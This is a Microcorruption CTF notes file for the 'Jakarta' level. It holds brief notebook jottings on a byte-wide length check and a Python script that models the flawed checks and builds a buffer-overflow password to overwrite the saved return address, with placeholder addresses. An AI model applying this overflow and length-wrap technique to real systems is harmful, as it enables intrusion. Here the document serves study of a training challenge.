MicroCorruption/11-Jakarta/notes.md


Taken verbatim from my notebook

Page 1

Jakarta
    Acquires 0xff username bytes
        -> 3ff2
    Acquires 0x1f - uname_len password bytes
        (0x1f - uname_len) & 0x1ff
        uname_len = 0x20? 0x21?
        => passwd_len = 0x1ff
        -> concatenated to username?
    Return value at 401c
        = [username][password][...]

    before strcpy:
        username -> 2402
        password -> 2402
        concat happens in stack buffer
    Length check happens bytewise
        0x0120 ~= 0x20 <= 0x21
        u_len = (0x20 or 0x21)
        p_len = (0xe0 -> 0x100)

    Password
    AA [r11] [ret] [fakeret] [args] [AA...AA]

    Lesson: Sometimes things are not the data type you think they are

// TODO: What does this mean??
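Added below, not from the notebook: a small Python model of the two length checks and a builder for the password layout sketched above (AA [r11] [ret] [fakeret] [args] [AA...AA]). The buffer address 0x3ff2, the return slot 0x401c and the getsn bounds are the ones in the notes; the saved-r11 value, return target, fake return and args are placeholders supplied by the caller, not addresses taken from the challenge.

```python
# Added example, not the notebook's own tooling: model of the Jakarta length
# checks plus a builder for the password layout in the notes.
# Addresses and bounds come from the notes; every address passed in by the
# caller (saved r11, ret, fake_ret, args) is a placeholder, not a real
# target from the challenge binary.

STACK_BUF = 0x3FF2    # username lands here after strcpy, password right after
RET_SLOT = 0x401C     # saved return address on the stack
USER_MAX = 0xFF       # getsn bound for the username
BYTE_LIMIT = 0x21     # both checks compare only the low byte against 0x21


def password_limit(u_len):
    """getsn bound for the password: (0x1f - u_len) & 0x1ff.
    Once u_len exceeds 0x1f the subtraction wraps and the mask leaves a
    large bound (0x1ff for u_len == 0x20) instead of a small one."""
    return (0x1F - u_len) & 0x1FF


def length_check_passes(n):
    """Byte-wide compare: only n & 0xff is tested, so 0x120 looks like 0x20.
    The notes were unsure whether 0x21 itself passes, so stay strictly
    below it; 0x20 passes under either reading."""
    return (n & 0xFF) < BYTE_LIMIT


def checks_pass(u_len, p_len):
    """The checks the login path applies, in order."""
    return (u_len <= USER_MAX
            and length_check_passes(u_len)
            and p_len <= password_limit(u_len)
            and length_check_passes(u_len + p_len))


def build_password(u_len, saved_r11, ret, fake_ret, args, total_len=0x120):
    """Password for a u_len-byte username.  Offsets follow from the notes'
    addresses: the password starts at STACK_BUF + u_len, saved r11 sits in
    the two bytes just below RET_SLOT, and total_len (default 0x120) is
    chosen so the byte-wide check sees 0x20.  MSP430 is little-endian."""
    pw_start = STACK_BUF + u_len
    pad = RET_SLOT - 2 - pw_start
    if pad < 0:
        raise ValueError("username already reaches the return slot")
    body = b"A" * pad
    body += saved_r11.to_bytes(2, "little")
    body += ret.to_bytes(2, "little")
    body += fake_ret.to_bytes(2, "little")
    for a in args:
        body += a.to_bytes(2, "little")
    p_len = total_len - u_len
    if len(body) > p_len:
        raise ValueError("payload longer than the password budget")
    body += b"A" * (p_len - len(body))
    # strcpy/strlen stop at the first NUL, so a 0x00 anywhere would cut the
    # copy short and the total length would no longer wrap as planned.
    if b"\x00" in body:
        raise ValueError("NUL byte in password; strcpy/strlen would stop early")
    if not checks_pass(u_len, p_len):
        raise ValueError("payload would fail a length check")
    return body


def login_input(u_len, saved_r11, ret, fake_ret, args):
    """Username and password as the hex strings the challenge input takes."""
    username = b"A" * u_len
    password = build_password(u_len, saved_r11, ret, fake_ret, args)
    return username.hex(), password.hex()


if __name__ == "__main__":
    # Placeholder values; substitute the target you pick from the disassembly.
    u, p = login_input(0x20, 0x4141, 0x4242, 0x4343, [0x4444])
    print("username:", u)
    print("password:", p)
```

With a 0x20-byte username the password starts at 0x4012, so 8 bytes of padding plus the 2-byte saved r11 put the next word on 0x401c. A 0x100-byte password is inside the 0x1ff getsn bound and makes the total 0x120, which the byte-wide compare sees as 0x20; any password length from 0xe0 to 0x100 wraps to 0x00..0x20, which is the e0 -> 100 range in the notes.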